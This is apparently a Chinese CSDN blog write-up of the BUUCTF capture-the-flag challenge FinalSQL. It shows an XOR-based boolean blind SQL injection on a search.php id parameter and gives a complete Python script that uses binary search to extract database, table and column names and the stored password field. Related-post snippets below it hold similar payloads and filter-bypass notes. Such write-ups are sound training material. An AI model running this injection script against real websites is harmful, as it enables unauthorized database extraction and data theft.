buuctf web finalsql

最新推荐文章于 2023-09-15 21:02:23 发布
最新推荐文章于 2023-09-15 21:02:23 发布
阅读量408 收藏
点赞数
分类专栏: BUUCTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696858/article/details/122249704
版权

没啥好说的,经典爆破,随便点一个数字,点1,会跳转到search.php?id=1
把1改成0,会报错error,经典布尔盲注,buuctf,原生爆破想都不要想,二分查找吧
先手动测试
payload?id=1^1 error
payload ?id=1^0 NO! Not this! Click others~~~
测试成功,脚本爆破

import re
import requests
import string
import time

url = "http://a3a385c8-781e-4ee7-b342-b239ceaa8a52.node4.buuoj.cn:81/search.php"
flag = ''


def payload(i, j):
    # 数据库名字
    # sql = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1" % (i, j)
    # 表名
    # sql = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))>%d)^1"%(i,j)
    # 列名
    # sql = "1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)^1"%(i,j)
    # 查询flag
    sql = "1^(ord(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1" % (i, j)
    data = {"id": sql}
    r = requests.get(url, params=data)
    # print (r.url)
    if "Click" in r.text:
        res = 1
    else:
        res = 0
    return res


def exp():
    global flag
    for i in range(1, 10000):
        time.sleep(1)
        print(i, ':')
        low = 31
        high = 127
        while low <= high:
            mid = (low + high) // 2
            res = payload(i, mid)
            if res:
                low = mid + 1
            else:
                high = mid - 1
        f = int((low + high + 1)) // 2
        if (f == 127 or f == 31):
            break
        # print (f)
        flag += chr(f)
        print(flag)


exp()
print('flag=', flag)

参考视频链接:https://www.bilibili.com/video/BV1GD4y1F7qv/

显哥无敌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[极客大挑战 2019]FinalSQL(bypass盲注)
qq_56313338的博客
09-06 730
这里是数字型注入,使用异或进行爆破
[极客大挑战 2019]FinalSQL
qq_52907838的博客
07-27 1583
打开环境,看题目就知道是个SQL题,有个登录框,上面还有5个选项: 依次点击一下: 这是我们注意到上面的参数值在随之变化: 他说在下一个,我们就改成id=6看看: 说明注入点应该是在id这个位置,我们输入:id=6' 显示:Error! 说明存在SQL注入,接着:id=6'or 1=1# 显示:你可别被我逮住了,臭弟弟,说明存在过滤,那过滤了哪些呢?我们来试一下,发现过滤了空格,等号,or,and,union,select这些都过滤得差不多了,...
BUUCTF [极客大挑战 2019]FinalSQL
qq_60829702的博客
10-21 1291
因为之前的几道盲注题目我都是直接看师傅的wp拿来用的,现在自己写一下发现果然光看不如去写。只有自己真正的去写了脚本才会发现一些东西永远都是看起来简单的一批,但是真正的让自己独立写出来还是有点难度的。毕竟那是别人的东西不是自己的东西,我们要把其他师傅的知识变成我们自己的。本人菜鸟一枚,虽然花了挺多时间写这个题目和wp的,但是收获到了很多东西,也希望我能坚持下来。
BUUCTF__web题解合集(六)
风过江南乱的博客
08-12 771
1、[BJDCTF 2nd]简单注入 2、[NCTF2019]Fake XML cookbook 3、[MRCTF2020]PYWebsite 4、[极客大挑战 2019]FinalSQL 5、[GKCTF2020]老八小超市儿
buuctf 极客大挑战 finalsql
SopRomeo的博客
02-05 1499
说来话长,这边记录下,页面不一样了,之前的注入全部行不通,考虑到最烦最难得盲注,利用二分法查找是非常快的 这边记下playload 查库名:id=1^(ascii(substr((select(database())),1,1))>1)^1 库名为geek 查表名:id=1^(ascii(substr((select(group_concat(table_name))from(inform...
BUUCTF部分web题目
最新发布
05-06
写题记录
BUUCTFweb之强网杯2019随便注
12-14
开始注入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: ...
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
【变量覆盖漏洞详解】 ...这类漏洞通常出现在以下几种情况: 1. **全局变量覆盖**: ...攻击者可以通过操纵这些请求参数来覆盖预定义的变量,造成安全风险。... ...2. **extract()函数使用不当**: `extract()`函数会从数组中...
BUUCTF逆向前八题
01-24
内容为BUUCTF里reserve的前八题自己的一些解题思路
BasicASM.s(BUUCTF
06-04
分析过程文件
buuctf-FinalSQL
m0_62094846的博客
05-11 385
说了是sql注入 看到页面首先会注入用户名和密码,但是一些字符和关键词如:' union都被过滤了 对那些数字入手看看 要第六个,可以对id入手 过滤了union ,空格,再加上id不能随意输入,随意返回,所以应该是盲注 而这里也同样过滤了很多,用布尔盲注,时间盲注都会被过滤 用异或注入试试(难度挺高的) 先尝试 ?id=1^0 ?id=1^(ascii(substr((select(group_concat(schema_name))from(information..
BUUCTF-[极客大挑战 2019]FinalSQL
weixin_44016181的博客
09-15 376
除了普通的注入流程,报错注入,时间注入外,这题涉及了布尔注入当中的异或注入,根据回显的状态信息来获取数据库的相关信息。这样即便是我们不能直接调用和查看数据库,也能通过这种特别的注入方式得到flag。
web buuctf [极客大挑战 2019]FinalSQL
weixin_44214568的博客
04-08 1135
知识点:盲注 1.开题 最上面提示用的语言php,脚本python,数据库mysql,注入形式sql盲注 2.随便点个12345,用bp抓包,进行fuzz 报错盲注,贴脚本 # -*- coding: utf-8 -*- # @Author: jiaoben # @Date : 2020/05/03 import re import requests import string url = "http://dcf33d60-7ffa-41c0-8915-e935ccbdd..
[极客大挑战 2019]FinalSQL wp
{OvEr}的博客
11-19 414
[极客大挑战 2019]FinalSQL wp 终极sql注入了,考点是盲注(写脚本的那种இ௰இ) 打开网页是这样的。 那个红色的卡片,我们随便点进去看看,直接点最后一个吧。 通过url判断注入点是id。 接着做FUZZ测试,发现同样过滤了union、or、and、||、&等我们常用的关键字,但是没有过滤异或符号^。 当我们输入id=1^1时,回显"Error" 当我们输入id=1^0时,回显正常 接下来我们进行盲注,下面是大神的脚本 step 1爆数据库 import requests u
[极客大挑战 2019]FinalSQL(异或盲注,二分法加多线程)
weixin_43610673的博客
06-16 647
点到第三个找到注入点,异或盲注,但这题很恶心,最后爆值的时候flag前面有很多无用信息,遂将这题当作脚本编写练习题,将嫖来的二分法脚本加上了多线程(只用二分法要跑10分钟) 这是别人博客嫖来的二分法注入脚本 https://www.cnblogs.com/wangtanzhi/p/12305052.html #sql injection.py # -*- coding: UTF-8 -*- import re import requests import string url = "http://1de
buuoj [极客大挑战 2019]FinalSQL
pondzhang的专栏
04-02 517
import requests #database length def get_database_length(): count = 0 while(1): url = "http://5a0d5a51-9667-4813-b173-b276246a28bc.node3.buuoj.cn/search.php?id=1^1^(length(database()...
buuctf [CISCN2019] hackworld
SopRomeo的博客
02-07 1725
过滤了很多sql字符,最终发现可以盲注,跟极客大挑战的fianlsql注入一样,这边告诉你表名和列名了 直接输入语句 1^(ascii(substr((select(flag)from(flag)),1,1))>1)^1 盲注手去敲太费时间,结合finalsql的经验,写脚本,注意这是post请求 奉上卑微脚本(看到大哥写的脚本太狠了) import requests import ti...
buuctf web
08-15
回答:根据引用和引用的内容,buuctf web应该是指buuctf比赛中的一个web题目。其中可能涉及到Tornado作为非阻塞式服务器的使用,以及render函数的使用。而根据引用的内容,buuctf web题目可能存在一些漏洞,比如SSRF(Server Side Request Forgery)漏洞,可以通过对内网web应用实施攻击获取webshell。因此,在buuctf web题目中,可能需要掌握SSRF漏洞的利用和对web应用的渲染函数(render函数)进行利用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [【CTF】buuctf web 详解(持续更新)](https://blog.csdn.net/m0_52923241/article/details/119641325)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [【BUUCTF刷题】Web解题方法总结(一)](https://blog.csdn.net/qq_45834505/article/details/114276572)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [BUUCTFWeb真题学习整理(一)](https://blog.csdn.net/qq_41429081/article/details/98042205)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值